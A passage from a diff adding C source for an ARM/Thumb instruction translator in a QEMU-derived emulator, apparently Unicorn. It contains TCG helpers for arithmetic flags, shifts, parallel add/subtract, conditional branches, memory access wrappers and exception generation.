tcg_gen_xori_i32(tcg_ctx, var, var, signbit); + tcg_gen_subi_i32(tcg_ctx, var, var, signbit); + } +} + +/* Return (b << 32) + a. Mark inputs as dead */ +static TCGv_i64 gen_addq_msw(DisasContext *s, TCGv_i64 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp64 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_i32_i64(tcg_ctx, tmp64, b); + tcg_temp_free_i32(tcg_ctx, b); + tcg_gen_shli_i64(tcg_ctx, tmp64, tmp64, 32); + tcg_gen_add_i64(tcg_ctx, a, tmp64, a); + + tcg_temp_free_i64(tcg_ctx, tmp64); + return a; +} + +/* Return (b << 32) - a. Mark inputs as dead. */ +static TCGv_i64 gen_subq_msw(DisasContext *s, TCGv_i64 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp64 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_i32_i64(tcg_ctx, tmp64, b); + tcg_temp_free_i32(tcg_ctx, b); + tcg_gen_shli_i64(tcg_ctx, tmp64, tmp64, 32); + tcg_gen_sub_i64(tcg_ctx, a, tmp64, a); + + tcg_temp_free_i64(tcg_ctx, tmp64); + return a; +} + +/* 32x32->64 multiply. Marks inputs as dead. */ +static TCGv_i64 gen_mulu_i64_i32(DisasContext *s, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 lo = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 hi = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 ret; + + tcg_gen_mulu2_i32(tcg_ctx, lo, hi, a, b); + tcg_temp_free_i32(tcg_ctx, a); + tcg_temp_free_i32(tcg_ctx, b); + + ret = tcg_temp_new_i64(tcg_ctx); + tcg_gen_concat_i32_i64(tcg_ctx, ret, lo, hi); + tcg_temp_free_i32(tcg_ctx, lo); + tcg_temp_free_i32(tcg_ctx, hi); + + return ret; +} + +static TCGv_i64 gen_muls_i64_i32(DisasContext *s, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 lo = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 hi = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 ret; + + tcg_gen_muls2_i32(tcg_ctx, lo, hi, a, b); + tcg_temp_free_i32(tcg_ctx, a); + tcg_temp_free_i32(tcg_ctx, b); + + ret = tcg_temp_new_i64(tcg_ctx); + tcg_gen_concat_i32_i64(tcg_ctx, ret, lo, hi); + tcg_temp_free_i32(tcg_ctx, lo); + tcg_temp_free_i32(tcg_ctx, hi); + + return ret; +} + +/* Swap low and high halfwords. */ +static void gen_swap_half(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, tmp, var, 16); + tcg_gen_shli_i32(tcg_ctx, var, var, 16); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +/* Dual 16-bit add. Result placed in t0 and t1 is marked as dead. + tmp = (t0 ^ t1) & 0x8000; + t0 &= ~0x8000; + t1 &= ~0x8000; + t0 = (t0 + t1) ^ tmp; + */ + +static void gen_add16(DisasContext *s, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0x8000); + tcg_gen_andi_i32(tcg_ctx, t0, t0, ~0x8000); + tcg_gen_andi_i32(tcg_ctx, t1, t1, ~0x8000); + tcg_gen_add_i32(tcg_ctx, t0, t0, t1); + tcg_gen_xor_i32(tcg_ctx, t0, t0, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, t1); +} + +/* Set CF to the top bit of var. */ +static void gen_set_CF_bit31(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, var, 31); +} + +/* Set N and Z flags from var. */ +static inline void gen_logic_CC(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, var); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, var); +} + +/* T0 += T1 + CF. */ +static void gen_adc(DisasContext *s, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_add_i32(tcg_ctx, t0, t0, t1); + tcg_gen_add_i32(tcg_ctx, t0, t0, tcg_ctx->cpu_CF); +} + +/* dest = T0 + T1 + CF. */ +static void gen_add_carry(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_add_i32(tcg_ctx, dest, t0, t1); + tcg_gen_add_i32(tcg_ctx, dest, dest, tcg_ctx->cpu_CF); +} + +/* dest = T0 - T1 + CF - 1. */ +static void gen_sub_carry(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_sub_i32(tcg_ctx, dest, t0, t1); + tcg_gen_add_i32(tcg_ctx, dest, dest, tcg_ctx->cpu_CF); + tcg_gen_subi_i32(tcg_ctx, dest, dest, 1); +} + +/* dest = T0 + T1. Compute C, N, V and Z flags */ +static void gen_add_CC(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0, tmp, t1, tmp); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); + tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); + tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); +} + +/* dest = T0 + T1 + CF. Compute C, N, V and Z flags */ +static void gen_adc_CC(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + if (TCG_TARGET_HAS_add2_i32) { + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0, tmp, tcg_ctx->cpu_CF, tmp); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t1, tmp); + } else { + TCGv_i64 q0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 q1 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, q0, t0); + tcg_gen_extu_i32_i64(tcg_ctx, q1, t1); + tcg_gen_add_i64(tcg_ctx, q0, q0, q1); + tcg_gen_extu_i32_i64(tcg_ctx, q1, tcg_ctx->cpu_CF); + tcg_gen_add_i64(tcg_ctx, q0, q0, q1); + tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, q0); + tcg_temp_free_i64(tcg_ctx, q0); + tcg_temp_free_i64(tcg_ctx, q1); + } + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); + tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); + tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); +} + +/* dest = T0 - T1. Compute C, N, V and Z flags */ +static void gen_sub_CC(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + tcg_gen_sub_i32(tcg_ctx, tcg_ctx->cpu_NF, t0, t1); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_CF, t0, t1); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); + tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); +} + +/* dest = T0 + ~T1 + CF. Compute C, N, V and Z flags */ +static void gen_sbc_CC(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_not_i32(tcg_ctx, tmp, t1); + gen_adc_CC(s, dest, t0, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +#define GEN_SHIFT(name) \ +static void gen_##name(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv_i32 tmp1, tmp2, tmp3; \ + tmp1 = tcg_temp_new_i32(tcg_ctx); \ + tcg_gen_andi_i32(tcg_ctx, tmp1, t1, 0xff); \ + tmp2 = tcg_const_i32(tcg_ctx, 0); \ + tmp3 = tcg_const_i32(tcg_ctx, 0x1f); \ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GTU, tmp2, tmp1, tmp3, tmp2, t0); \ + tcg_temp_free_i32(tcg_ctx, tmp3); \ + tcg_gen_andi_i32(tcg_ctx, tmp1, tmp1, 0x1f); \ + tcg_gen_##name##_i32(tcg_ctx, dest, tmp2, tmp1); \ + tcg_temp_free_i32(tcg_ctx, tmp2); \ + tcg_temp_free_i32(tcg_ctx, tmp1); \ +} +GEN_SHIFT(shl) +GEN_SHIFT(shr) +#undef GEN_SHIFT + +static void gen_sar(DisasContext *s, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp1, tmp2; + tmp1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp1, t1, 0xff); + tmp2 = tcg_const_i32(tcg_ctx, 0x1f); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GTU, tmp1, tmp1, tmp2, tmp2, tmp1); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_gen_sar_i32(tcg_ctx, dest, t0, tmp1); + tcg_temp_free_i32(tcg_ctx, tmp1); +} + +static void tcg_gen_abs_i32(DisasContext *s, TCGv_i32 dest, TCGv_i32 src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 c0 = tcg_const_i32(tcg_ctx, 0); + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_neg_i32(tcg_ctx, tmp, src); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GT, dest, src, c0, src, tmp); + tcg_temp_free_i32(tcg_ctx, c0); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static void shifter_out_im(DisasContext *s, TCGv_i32 var, int shift) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (shift == 0) { + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, var, 1); + } else { + tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, var, shift); + if (shift != 31) { + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, 1); + } + } +} + +/* Shift by immediate. Includes special handling for shift == 0. */ +static inline void gen_arm_shift_im(DisasContext *s, TCGv_i32 var, int shiftop, + int shift, int flags) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (shiftop) { + case 0: /* LSL */ + if (shift != 0) { + if (flags) + shifter_out_im(s, var, 32 - shift); + tcg_gen_shli_i32(tcg_ctx, var, var, shift); + } + break; + case 1: /* LSR */ + if (shift == 0) { + if (flags) { + tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, var, 31); + } + tcg_gen_movi_i32(tcg_ctx, var, 0); + } else { + if (flags) + shifter_out_im(s, var, shift - 1); + tcg_gen_shri_i32(tcg_ctx, var, var, shift); + } + break; + case 2: /* ASR */ + if (shift == 0) + shift = 32; + if (flags) + shifter_out_im(s, var, shift - 1); + if (shift == 32) + shift = 31; + tcg_gen_sari_i32(tcg_ctx, var, var, shift); + break; + case 3: /* ROR/RRX */ + if (shift != 0) { + if (flags) + shifter_out_im(s, var, shift - 1); + tcg_gen_rotri_i32(tcg_ctx, var, var, shift); break; + } else { + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shli_i32(tcg_ctx, tmp, tcg_ctx->cpu_CF, 31); + if (flags) + shifter_out_im(s, var, 0); + tcg_gen_shri_i32(tcg_ctx, var, var, 1); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } + } +} + +static inline void gen_arm_shift_reg(DisasContext *s, TCGv_i32 var, int shiftop, + TCGv_i32 shift, int flags) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (flags) { + switch (shiftop) { + case 0: gen_helper_shl_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; + case 1: gen_helper_shr_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; + case 2: gen_helper_sar_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; + case 3: gen_helper_ror_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; + } + } else { + switch (shiftop) { + case 0: + gen_shl(s, var, var, shift); + break; + case 1: + gen_shr(s, var, var, shift); + break; + case 2: + gen_sar(s, var, var, shift); + break; + case 3: tcg_gen_andi_i32(tcg_ctx, shift, shift, 0x1f); + tcg_gen_rotr_i32(tcg_ctx, var, var, shift); break; + } + } + tcg_temp_free_i32(tcg_ctx, shift); +} + +#define PAS_OP(pfx) \ + switch (op2) { \ + case 0: gen_pas_helper(glue(pfx,add16)); break; \ + case 1: gen_pas_helper(glue(pfx,addsubx)); break; \ + case 2: gen_pas_helper(glue(pfx,subaddx)); break; \ + case 3: gen_pas_helper(glue(pfx,sub16)); break; \ + case 4: gen_pas_helper(glue(pfx,add8)); break; \ + case 7: gen_pas_helper(glue(pfx,sub8)); break; \ + } +static void gen_arm_parallel_addsub(DisasContext *s, int op1, int op2, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr tmp; + + switch (op1) { +#define gen_pas_helper(name) glue(gen_helper_,name)(tcg_ctx, a, a, b, tmp) + case 1: + tmp = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_addi_ptr(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + PAS_OP(s) + tcg_temp_free_ptr(tcg_ctx, tmp); + break; + case 5: + tmp = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_addi_ptr(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + PAS_OP(u) + tcg_temp_free_ptr(tcg_ctx, tmp); + break; +#undef gen_pas_helper +#define gen_pas_helper(name) glue(gen_helper_,name)(tcg_ctx, a, a, b) + case 2: + PAS_OP(q); + break; + case 3: + PAS_OP(sh); + break; + case 6: + PAS_OP(uq); + break; + case 7: + PAS_OP(uh); + break; +#undef gen_pas_helper + } +} +#undef PAS_OP + +/* For unknown reasons Arm and Thumb-2 use arbitrarily different encodings. */ +#define PAS_OP(pfx) \ + switch (op1) { \ + case 0: gen_pas_helper(glue(pfx,add8)); break; \ + case 1: gen_pas_helper(glue(pfx,add16)); break; \ + case 2: gen_pas_helper(glue(pfx,addsubx)); break; \ + case 4: gen_pas_helper(glue(pfx,sub8)); break; \ + case 5: gen_pas_helper(glue(pfx,sub16)); break; \ + case 6: gen_pas_helper(glue(pfx,subaddx)); break; \ + } +static void gen_thumb2_parallel_addsub(DisasContext *s, int op1, int op2, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr tmp; + + switch (op2) { +#define gen_pas_helper(name) glue(gen_helper_,name)(tcg_ctx, a, a, b, tmp) + case 0: + tmp = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_addi_ptr(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + PAS_OP(s) + tcg_temp_free_ptr(tcg_ctx, tmp); + break; + case 4: + tmp = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_addi_ptr(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + PAS_OP(u) + tcg_temp_free_ptr(tcg_ctx, tmp); + break; +#undef gen_pas_helper +#define gen_pas_helper(name) glue(gen_helper_,name)(tcg_ctx, a, a, b) + case 1: + PAS_OP(q); + break; + case 2: + PAS_OP(sh); + break; + case 5: + PAS_OP(uq); + break; + case 6: + PAS_OP(uh); + break; +#undef gen_pas_helper + } +} +#undef PAS_OP + +/* + * generate a conditional branch based on ARM condition code cc. + * This is common between ARM and Aarch64 targets. + */ +void arm_gen_test_cc(TCGContext *tcg_ctx, int cc, int label) +{ + TCGv_i32 tmp; + int inv; + + switch (cc) { + case 0: /* eq: Z */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, 0, label); + break; + case 1: /* ne: !Z */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_ZF, 0, label); + break; + case 2: /* cs: C */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_CF, 0, label); + break; + case 3: /* cc: !C */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_CF, 0, label); + break; + case 4: /* mi: N */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_NF, 0, label); + break; + case 5: /* pl: !N */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_NF, 0, label); + break; + case 6: /* vs: V */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_VF, 0, label); + break; + case 7: /* vc: !V */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_VF, 0, label); + break; + case 8: /* hi: C && !Z */ + inv = gen_new_label(tcg_ctx); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_CF, 0, inv); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_ZF, 0, label); + gen_set_label(tcg_ctx, inv); + break; + case 9: /* ls: !C || Z */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_CF, 0, label); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, 0, label); + break; + case 10: /* ge: N == V -> N ^ V == 0 */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, tmp, 0, label); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 11: /* lt: N != V -> N ^ V != 0 */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, tmp, 0, label); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 12: /* gt: !Z && N == V */ + inv = gen_new_label(tcg_ctx); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, 0, inv); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, tmp, 0, label); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_set_label(tcg_ctx, inv); + break; + case 13: /* le: Z || N != V */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, 0, label); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, tmp, 0, label); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + default: + /* fprintf(stderr, "Bad condition code 0x%x\n", cc); */ + tmp = tcg_const_i32(tcg_ctx, EXCP_EXCEPTION_EXIT); + gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } +} + +static const uint8_t table_logic_cc[16] = { + 1, /* and */ + 1, /* xor */ + 0, /* sub */ + 0, /* rsb */ + 0, /* add */ + 0, /* adc */ + 0, /* sbc */ + 0, /* rsc */ + 1, /* andl */ + 1, /* xorl */ + 0, /* cmp */ + 0, /* cmn */ + 1, /* orr */ + 1, /* mov */ + 1, /* bic */ + 1, /* mvn */ +}; + +/* Set PC and Thumb state from an immediate address. */ +static inline void gen_bx_im(DisasContext *s, uint32_t addr) +{ + TCGv_i32 tmp; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + s->is_jmp = DISAS_UPDATE; + if (s->thumb != (addr & 1)) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, addr & 1); + tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, thumb)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], addr & ~1); +} + +/* Set PC and Thumb state from var. var is marked as dead. */ +static inline void gen_bx(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + s->is_jmp = DISAS_UPDATE; + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_R[15], var, ~1); + tcg_gen_andi_i32(tcg_ctx, var, var, 1); + store_cpu_field(tcg_ctx, var, thumb); +} + +/* Variant of store_reg which uses branch&exchange logic when storing + to r15 in ARM architecture v7 and above. The source must be a temporary + and will be marked as dead. */ +static inline void store_reg_bx(DisasContext *s, int reg, TCGv_i32 var) +{ + if (reg == 15 && ENABLE_ARCH_7) { + gen_bx(s, var); + } else { + store_reg(s, reg, var); + } +} + +/* Variant of store_reg which uses branch&exchange logic when storing + * to r15 in ARM architecture v5T and above. This is used for storing + * the results of a LDR/LDM/POP into r15, and corresponds to the cases + * in the ARM ARM which use the LoadWritePC() pseudocode function. */ +static inline void store_reg_from_load(DisasContext *s, int reg, TCGv_i32 var) +{ + if (reg == 15 && ENABLE_ARCH_5) { + gen_bx(s, var); + } else { + store_reg(s, reg, var); + } +} + +/* Abstractions of "generate code to do a guest load/store for + * AArch32", where a vaddr is always 32 bits (and is zero + * extended if we're a 64 bit core) and data is also + * 32 bits unless specifically doing a 64 bit access. + * These functions work like tcg_gen_qemu_{ld,st}* except + * that the address argument is TCGv_i32 rather than TCGv. + */ +#if TARGET_LONG_BITS == 32 + +#define DO_GEN_LD(SUFF, OPC) \ +static inline void gen_aa32_ld##SUFF(DisasContext *s, TCGv_i32 val, TCGv_i32 addr, int index) \ +{ \ + tcg_gen_qemu_ld_i32(s->uc, val, addr, index, OPC); \ +} + +#define DO_GEN_ST(SUFF, OPC) \ +static inline void gen_aa32_st##SUFF(DisasContext *s, TCGv_i32 val, TCGv_i32 addr, int index) \ +{ \ + tcg_gen_qemu_st_i32(s->uc, val, addr, index, OPC); \ +} + +static inline void gen_aa32_ld64(DisasContext *s, TCGv_i64 val, TCGv_i32 addr, int index) +{ + tcg_gen_qemu_ld_i64(s->uc, val, addr, index, MO_TEQ); +} + +static inline void gen_aa32_st64(DisasContext *s, TCGv_i64 val, TCGv_i32 addr, int index) +{ + tcg_gen_qemu_st_i64(s->uc, val, addr, index, MO_TEQ); +} + +#else + +#define DO_GEN_LD(SUFF, OPC) \ +static inline void gen_aa32_ld##SUFF(DisasContext *s, TCGv_i32 val, TCGv_i32 addr, int index) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv addr64 = tcg_temp_new(tcg_ctx); \ + tcg_gen_extu_i32_i64(tcg_ctx, addr64, addr); \ + tcg_gen_qemu_ld_i32(s->uc, val, addr64, index, OPC); \ + tcg_temp_free(tcg_ctx, addr64); \ +} + +#define DO_GEN_ST(SUFF, OPC) \ +static inline void gen_aa32_st##SUFF(DisasContext *s, TCGv_i32 val, TCGv_i32 addr, int index) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv addr64 = tcg_temp_new(tcg_ctx); \ + tcg_gen_extu_i32_i64(tcg_ctx, addr64, addr); \ + tcg_gen_qemu_st_i32(s->uc, val, addr64, index, OPC); \ + tcg_temp_free(tcg_ctx, addr64); \ +} + +static inline void gen_aa32_ld64(DisasContext *s, TCGv_i64 val, TCGv_i32 addr, int index) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv addr64 = tcg_temp_new(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, addr64, addr); + tcg_gen_qemu_ld_i64(s->uc, val, addr64, index, MO_TEQ); + tcg_temp_free(tcg_ctx, addr64); +} + +static inline void gen_aa32_st64(DisasContext *s, TCGv_i64 val, TCGv_i32 addr, int index) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv addr64 = tcg_temp_new(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, addr64, addr); + tcg_gen_qemu_st_i64(s->uc, val, addr64, index, MO_TEQ); + tcg_temp_free(tcg_ctx, addr64); +} + +#endif + +DO_GEN_LD(8s, MO_SB) +DO_GEN_LD(8u, MO_UB) +DO_GEN_LD(16s, MO_TESW) +DO_GEN_LD(16u, MO_TEUW) +DO_GEN_LD(32u, MO_TEUL) +DO_GEN_ST(8, MO_UB) +DO_GEN_ST(16, MO_TEUW) +DO_GEN_ST(32, MO_TEUL) + +static inline void gen_set_pc_im(DisasContext *s, target_ulong val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], val); +} + +static inline void gen_hvc(DisasContext *s, int imm16) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* The pre HVC helper handles cases when HVC gets trapped + * as an undefined insn by runtime configuration (ie before + * the insn really executes). + */ + gen_set_pc_im(s, s->pc - 4); + gen_helper_pre_hvc(tcg_ctx, tcg_ctx->cpu_env); + /* Otherwise we will treat this as a real exception which + * happens after execution of the insn. (The distinction matters + * for the PC value reported to the exception handler and also + * for single stepping.) + */ + s->svc_imm = imm16; + gen_set_pc_im(s, s->pc); + s->is_jmp = DISAS_HVC; +} + +static inline void gen_smc(DisasContext *s) +{ + /* As with HVC, we may take an exception either before or after + * the insn executes. + */ + TCGv_i32 tmp; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_set_pc_im(s, s->pc - 4); + tmp = tcg_const_i32(tcg_ctx, syn_aa32_smc()); + gen_helper_pre_smc(tcg_ctx, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_set_pc_im(s, s->pc); + s->is_jmp = DISAS_SMC; +} + +static inline void +gen_set_condexec (DisasContext *s) +{ + if (s->condexec_mask) { + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t val = (s->condexec_cond << 4) | (s->condexec_mask >> 1); + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + store_cpu_field(tcg_ctx, tmp, condexec_bits); + } +} + +static void gen_exception_internal_insn(DisasContext *s, int offset, int excp) +{ + gen_set_condexec(s); + gen_set_pc_im(s, s->pc - offset); + gen_exception_internal(s, excp); + s->is_jmp = DISAS_JUMP; +} + +static void gen_exception_insn(DisasContext *s, int offset, int excp, int syn) +{ + gen_set_condexec(s); + gen_set_pc_im(s, s->pc - offset); + 